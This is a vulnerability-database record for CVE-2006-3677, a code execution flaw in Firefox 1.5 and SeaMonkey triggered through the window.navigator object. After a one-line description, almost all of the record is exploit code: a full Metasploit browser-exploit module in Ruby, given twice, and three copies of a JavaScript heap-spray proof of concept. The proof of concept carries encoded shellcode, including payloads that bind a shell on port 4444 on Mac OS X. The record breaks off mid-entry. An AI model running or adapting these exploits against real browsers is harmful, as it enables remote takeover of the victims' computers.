ID CVE-2006-3677 Type cve Reporter cve@mitre.org Modified 2018-10-18T16:48:00
Description
Mozilla Firefox 1.5 before 1.5.0.5 and SeaMonkey before 1.0.3 allows remote attackers to execute arbitrary code by changing certain properties of the window navigator object (window.navigator) that are accessed when Java starts up, which causes a crash that leads to code execution.
{"metasploit": [{"lastseen": "2020-08-18T00:50:02", "description": "This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.\n", "published": "2006-09-17T08:00:37", "type": "metasploit", "title": "Mozilla Suite/Firefox Navigator Object Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/BROWSER/MOZILLA_NAVIGATORJAVA", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/constants'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :ua_name => HttpClients::FF,\n # :ua_minver => \"1.5.0\",\n # :ua_maxver => \"1.5.1\",\n # :javascript => true,\n # :rank => NormalRanking, # reliable memory corruption\n # :vuln_test => %Q|\n # is_vuln = false;\n # if (navigator.javaEnabled()){\n # is_vuln = true;\n # }\n # |,\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',\n 'Description' => %q{\n This module exploits a code execution vulnerability in the Mozilla\n Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n requires the Java plugin to be installed.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['hdm'],\n 'References' =>\n [\n ['CVE', '2006-3677'],\n ['OSVDB', '27559'],\n ['BID', '19192'],\n ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html']\n ],\n 'Payload' =>\n {\n 'Space' => 512,\n 'BadChars' => \"\",\n },\n 'Platform' => %w{ win linux osx },\n 'Targets' =>\n [\n [ 'Firefox 1.5.0.4 Windows x86',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Ret' => 0x08000800,\n 'Fill' => \"%u0800\",\n }\n ],\n [ 'Firefox 1.5.0.4 Linux x86',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Ret' => -0x58000000,\n 'Fill' => \"%ua8a8\",\n }\n ],\n [ 'Firefox 1.5.0.4 Mac OS X PPC',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n 'Ret' => 0x0c000000,\n 'Fill' => \"%u0c0c\",\n }\n ],\n [ 'Firefox 1.5.0.4 Mac OS X x86',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86,\n 'Ret' => 0x1c000000,\n 'Fill' => \"%u1c1c\",\n }\n ],\n ],\n 'DisclosureDate' => 'Jul 25 2006'\n ))\n end\n\n def on_request_uri(cli, request)\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n print_status(\"Sending #{self.name}\")\n send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })\n\n # Handle the payload\n handler(cli)\n end\n\n def generate_html(payload)\n\n enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n return %Q|\n<html><head>\n<script>\n function Exploit() {\n if (window.navigator.javaEnabled) {\n var shellcode = unescape(\"#{enc_code}\");\n var b = unescape(\"#{target['Fill']}\");\n while (b.length <= 0x400000) b+=b;\n\n var c = new Array();\n for (var i =0; i<36; i++) {\n c[i] =\n b.substring(0, 0x100000 - shellcode.length) + shellcode +\n b.substring(0, 0x100000 - shellcode.length) + shellcode +\n b.substring(0, 0x100000 - shellcode.length) + shellcode +\n b.substring(0, 0x100000 - shellcode.length) + shellcode;\n }\n\n window.navigator = (#{target['Ret']} / 2);\n try {\n java.lang.reflect.Runtime.newInstance(\n java.lang.Class.forName(\"java.lang.Runtime\"), 0\n );\n }catch(e){\n\n }\n }\n }\n</script>\n</head><body onload='Exploit()'>Please wait...</body></html>\n |\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/mozilla_navigatorjava.rb"}], "seebug": [{"lastseen": "2017-11-19T22:28:52", "description": "No description provided by source.", "published": "2006-07-28T00:00:00", "type": "seebug", "title": "Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "modified": "2006-07-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-16318", "id": "SSV:16318", "sourceData": "\n <!--\r\nFirefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC \r\nhttp://browserfun.blogspot.com/\r\n\r\nThe following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running \r\non Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. \r\nThis bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of \r\nMozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is \r\ntrivial to turn into a working exploit. The demonstration link below will attempt \r\nto launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.\r\n\r\nwindow.navigator = (0x01020304 / 2);\r\njava.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);\r\n\r\n-->\r\n\r\n<html><body><script>\r\n\r\n// MoBB Demonstration\r\nfunction Demo() {\r\n\r\n\t// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\n\t// https://bugzilla.mozilla.org/show_bug.cgi?id=342267\r\n\t// CVE-2006-3677\r\n\r\n\t// The Java plugin is required for this to work\r\n\r\n\t// win32 = calc.exe\r\n\tvar shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');\r\n\tvar fill_win32 = unescape('%u0800');\r\n\tvar addr_win32 = 0x08000800;\r\n\t\r\n\t// linux = touch /tmp/METASPLOIT (unreliable)\r\n\tvar shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');\r\n\tvar fill_linux = unescape('%ua8a8');\r\n\tvar addr_linux = -0x58000000; // Integer wrap: 0xa8000000\r\n\r\n\t// mac os x ppc = bind a shell to 4444\r\n\tvar shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');\r\n\tvar fill_macppc = unescape('%u0c0c');\r\n\tvar addr_macppc = 0x0c000000;\r\n\t\r\n\t// mac os x intel = bind a shell to 4444\r\n\t// Thanks to nemo[at]felinemenace.org for shellcode\r\n\t// Thanks to Todd Manning for the target information and testing\r\n\tvar shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');\r\n\tvar fill_macx86 = unescape('%u1c1c');\r\n\tvar addr_macx86 = 0x1c000000;\t\t\r\n\r\n\r\n\t// Start the browser detection\r\n\tvar shellcode;\r\n\tvar addr;\r\n\tvar fill;\r\n\tvar ua = '' + navigator.userAgent;\r\n\r\n\tif (ua.indexOf('Linux') != -1) {\r\n\t\talert('Trying to create /tmp/METASPLOIT');\r\n\t\tshellcode = shellcode_linux;\r\n\t\taddr = addr_linux;\r\n\t\tfill = fill_linux;\r\n\t}\r\n\t\r\n\tif (ua.indexOf('Windows') != -1) {\r\n\t\talert('Trying to launch Calculator');\t\r\n\t\tshellcode = shellcode_win32;\r\n\t\taddr = addr_win32;\r\n\t\tfill = fill_win32;\r\n\t}\t\r\n\r\n\tif (ua.indexOf('PPC Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macppc;\r\n\t\taddr = addr_macppc;\r\n\t\tfill = fill_macppc;\r\n\t}\t\r\n\t\r\n\tif (ua.indexOf('Intel Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macx86;\r\n\t\taddr = addr_macx86;\r\n\t\tfill = fill_macx86;\r\n\t}\r\n\t\t\t\r\n\tif (! shellcode) {\r\n\t\talert('OS not supported, only attempting a crash!');\r\n\t\tshellcode = unescape('%ucccc');\r\n\t\tfill = unescape('%ucccc');\r\n\t\taddr = 0x02020202;\r\n\t}\r\n\t\t\r\n\tvar b = fill;\r\n\twhile (b.length <= 0x400000) b+=b;\r\n\r\n\tvar c = new Array();\r\n\tfor (var i =0; i<36; i++) {\r\n\t\tc[i] = \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\r\n\t}\r\n\t\t\t\r\n\t\r\n\tif (window.navigator.javaEnabled) {\r\n\t\twindow.navigator = (addr / 2);\r\n\t\ttry {\r\n\t\t\tjava.lang.reflect.Runtime.newInstance(\r\n\t\t\t\tjava.lang.Class.forName("java.lang.Runtime"), 0\r\n\t\t\t);\r\n\t\t\talert('Patched!');\r\n\t\t}catch(e){\r\n\t\t\talert('No Java plugin installed!');\r\n\t\t}\r\n\t}\r\n}\r\n\r\n</script>\r\n\r\nClicking the button below may crash your browser!<br><br>\r\n<input type='button' onClick='Demo()' value='Start Demo!'>\r\n\r\n\r\n</body></html>\r\n\r\n# milw0rm.com [2006-07-28]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-16318", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:35:33", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Mozilla Firefox <= 1.5.0.4 - Javascript Navigator Object Code Execution PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-63754", "id": "SSV:63754", "sourceData": "\n <!--\r\nFirefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC \r\nhttp://browserfun.blogspot.com/\r\n\r\nThe following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running \r\non Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. \r\nThis bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of \r\nMozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is \r\ntrivial to turn into a working exploit. The demonstration link below will attempt \r\nto launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.\r\n\r\nwindow.navigator = (0x01020304 / 2);\r\njava.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);\r\n\r\n-->\r\n\r\n<html><body><script>\r\n\r\n// MoBB Demonstration\r\nfunction Demo() {\r\n\r\n\t// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\n\t// https://bugzilla.mozilla.org/show_bug.cgi?id=342267\r\n\t// CVE-2006-3677\r\n\r\n\t// The Java plugin is required for this to work\r\n\r\n\t// win32 = calc.exe\r\n\tvar shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');\r\n\tvar fill_win32 = unescape('%u0800');\r\n\tvar addr_win32 = 0x08000800;\r\n\t\r\n\t// linux = touch /tmp/METASPLOIT (unreliable)\r\n\tvar shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');\r\n\tvar fill_linux = unescape('%ua8a8');\r\n\tvar addr_linux = -0x58000000; // Integer wrap: 0xa8000000\r\n\r\n\t// mac os x ppc = bind a shell to 4444\r\n\tvar shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');\r\n\tvar fill_macppc = unescape('%u0c0c');\r\n\tvar addr_macppc = 0x0c000000;\r\n\t\r\n\t// mac os x intel = bind a shell to 4444\r\n\t// Thanks to nemo[at]felinemenace.org for shellcode\r\n\t// Thanks to Todd Manning for the target information and testing\r\n\tvar shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');\r\n\tvar fill_macx86 = unescape('%u1c1c');\r\n\tvar addr_macx86 = 0x1c000000;\t\t\r\n\r\n\r\n\t// Start the browser detection\r\n\tvar shellcode;\r\n\tvar addr;\r\n\tvar fill;\r\n\tvar ua = '' + navigator.userAgent;\r\n\r\n\tif (ua.indexOf('Linux') != -1) {\r\n\t\talert('Trying to create /tmp/METASPLOIT');\r\n\t\tshellcode = shellcode_linux;\r\n\t\taddr = addr_linux;\r\n\t\tfill = fill_linux;\r\n\t}\r\n\t\r\n\tif (ua.indexOf('Windows') != -1) {\r\n\t\talert('Trying to launch Calculator');\t\r\n\t\tshellcode = shellcode_win32;\r\n\t\taddr = addr_win32;\r\n\t\tfill = fill_win32;\r\n\t}\t\r\n\r\n\tif (ua.indexOf('PPC Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macppc;\r\n\t\taddr = addr_macppc;\r\n\t\tfill = fill_macppc;\r\n\t}\t\r\n\t\r\n\tif (ua.indexOf('Intel Mac OS') != -1) {\r\n\t\talert('Trying to bind a shell to 4444');\r\n\t\tshellcode = shellcode_macx86;\r\n\t\taddr = addr_macx86;\r\n\t\tfill = fill_macx86;\r\n\t}\r\n\t\t\t\r\n\tif (! shellcode) {\r\n\t\talert('OS not supported, only attempting a crash!');\r\n\t\tshellcode = unescape('%ucccc');\r\n\t\tfill = unescape('%ucccc');\r\n\t\taddr = 0x02020202;\r\n\t}\r\n\t\t\r\n\tvar b = fill;\r\n\twhile (b.length <= 0x400000) b+=b;\r\n\r\n\tvar c = new Array();\r\n\tfor (var i =0; i<36; i++) {\r\n\t\tc[i] = \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\r\n\t}\r\n\t\t\t\r\n\t\r\n\tif (window.navigator.javaEnabled) {\r\n\t\twindow.navigator = (addr / 2);\r\n\t\ttry {\r\n\t\t\tjava.lang.reflect.Runtime.newInstance(\r\n\t\t\t\tjava.lang.Class.forName("java.lang.Runtime"), 0\r\n\t\t\t);\r\n\t\t\talert('Patched!');\r\n\t\t}catch(e){\r\n\t\t\talert('No Java plugin installed!');\r\n\t\t}\r\n\t}\r\n}\r\n\r\n</script>\r\n\r\nClicking the button below may crash your browser!<br><br>\r\n<input type='button' onClick='Demo()' value='Start Demo!'>\r\n\r\n\r\n</body></html>\r\n\r\n# milw0rm.com [2006-07-28]\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-63754"}, {"lastseen": "2017-11-19T22:30:54", "description": "No description provided by source.", "published": "2006-10-24T00:00:00", "type": "seebug", "title": "Mozilla Firefox Javascript Navigator Object Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "modified": "2006-10-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-5225", "id": "SSV:5225", "sourceData": "\n // MoBB Demonstration\r\nfunction Demo() {\r\n\r\n\t// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\n\t// https://bugzilla.mozilla.org/show_bug.cgi?id=342267\r\n\t// CVE-2006-3677\r\n\r\n\t// The Java plugin is required for this to work\r\n\r\n\t// win32 = calc.exe\r\n\tvar shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');\r\n\tvar fill_win32 = unescape('%u0800');\r\n\tvar addr_win32 = 0x08000800;\r\n\t\r\n\t// linux = touch /tmp/METASPLOIT (unreliable)\r\n\tvar shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');\r\n\tvar fill_linux = unescape('%ua8a8');\r\n\tvar addr_linux = -0x58000000; // Integer wrap: 0xa8000000\r\n\t\r\n\tvar shellcode;\r\n\tvar addr;\r\n\tvar fill;\r\n\t\r\n\tif (navigator.userAgent.indexOf('Linux i') != -1) {\r\n\t\talert('Trying to create /tmp/METASPLOIT');\r\n\t\tshellcode = shellcode_linux;\r\n\t\taddr = addr_linux;\r\n\t\tfill = fill_linux;\r\n\t}\r\n\t\r\n\tif (navigator.userAgent.indexOf('Windows') != -1) {\r\n\t\talert('Trying to launch Calculator');\t\r\n\t\tshellcode = shellcode_win32;\r\n\t\taddr = addr_win32;\r\n\t\tfill = fill_win32;\r\n\t}\t\r\n\t\r\n\tif (! shellcode) {\r\n\t\talert('OS not supported, only attempting a crash!');\r\n\t\tshellcode = unescape('%ucccc');\r\n\t\tfill = unescape('%cccc');\r\n\t\taddr = 0xcccccccc;\r\n\t}\r\n\t\t\r\n\tvar b = fill;\r\n\twhile (b.length <= 0x400000) b+=b;\r\n\r\n\tvar c = new Array();\r\n\tfor (var i =0; i<36; i++) {\r\n\t\tc[i] = \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\r\n\t}\r\n\t\t\t\r\n\t\r\n\tif (window.navigator.javaEnabled) {\r\n\t\twindow.navigator = (addr / 2);\r\n\t\ttry {\r\n\t\t\tjava.lang.reflect.Runtime.newInstance(\r\n\t\t\t\tjava.lang.Class.forName("java.lang.Runtime"), 0\r\n\t\t\t);\r\n\t\t\talert('Patched!');\r\n\t\t}catch(e){\r\n\t\t\talert('No Java plugin installed!');\r\n\t\t}\r\n\t}\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-5225", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T11:35:38", "description": "Mozilla Suite/Firefox < 1.5.0.5 Navigator Object Code Execution. CVE-2006-3677. Remote exploits for multiple platform", "published": "2006-07-25T00:00:00", "type": "exploitdb", "title": "Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3677"], "modified": "2006-07-25T00:00:00", "id": "EDB-ID:9946", "href": "https://www.exploit-db.com/exploits/9946/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core/constants'\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:ua_name => HttpClients::FF,\r\n\t\t:javascript => true,\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:vuln_test => %Q|\r\n\t\t\tis_vuln = false;\r\n\t\t\tif (window.navigator.javaEnabled && window.navigator.javaEnabled()){\r\n\t\t\t\tis_vuln = true; \r\n\t\t\t}\r\n\t\t\t|,\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\r\n\t\t\tSuite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit \r\n\t\t\trequires the Java plugin to be installed.\r\n\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => ['hdm'],\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' => \r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3677'],\r\n\t\t\t\t\t['OSVDB', '27559'],\r\n\t \t\t\t\t['BID', '19192'],\r\n\t\t\t\t\t['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'],\r\n\t\t\t\t\t['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Firefox 1.5.0.4 Windows x86', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => 0x08000800,\r\n\t\t\t\t\t\t\t'Fill' => \"%u0800\",\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Firefox 1.5.0.4 Linux x86', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => -0x58000000,\r\n\t\t\t\t\t\t\t'Fill' => \"%ua8a8\",\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Firefox 1.5.0.4 Mac OS X PPC', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t\t'Ret' => 0x0c000000,\r\n\t\t\t\t\t\t\t'Fill' => \"%u0c0c\",\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Firefox 1.5.0.4 Mac OS X x86', \r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Ret' => 0x1c000000,\r\n\t\t\t\t\t\t\t'Fill' => \"%u1c1c\",\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 25 2006'\r\n\t\t\t))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\t\tsend_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })\r\n\t\t\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\t\r\n\tdef generate_html(payload)\r\n\r\n\t\tenc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\treturn %Q|\r\n<html><head>\r\n<script>\r\n\tfunction Exploit() {\r\n\t\tif (window.navigator.javaEnabled) {\r\n\t\t\tvar shellcode = unescape(\"#{enc_code}\");\r\n\t\t\tvar b = unescape(\"#{target['Fill']}\");\r\n\t\t\twhile (b.length <= 0x400000) b+=b;\r\n\r\n\t\t\tvar c = new Array();\r\n\t\t\tfor (var i =0; i<36; i++) {\r\n\t\t\t\tc[i] = \r\n\t\t\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode +\r\n\t\t\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode + \r\n\t\t\t\t\tb.substring(0, 0x100000 - shellcode.length) + shellcode;\r\n\t\t\t}\r\n\r\n\t\t\twindow.navigator = (#{target['Ret']} / 2);\r\n\t\t\ttry {\r\n\t\t\t\tjava.lang.reflect.Runtime.newInstance(\r\n\t\t\t\t\tjava.lang.Class.forName(\"java.lang.Runtime\"), 0\r\n\t\t\t\t);\r\n\t\t\t}catch(e){\r\n\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n</script>\r\n</head><body onload='Exploit()'>Please wait...</body></html>\r\n\t\t|\r\n\tend\r\nend\r\n", "cvss": {"score": 7.5, "vector": 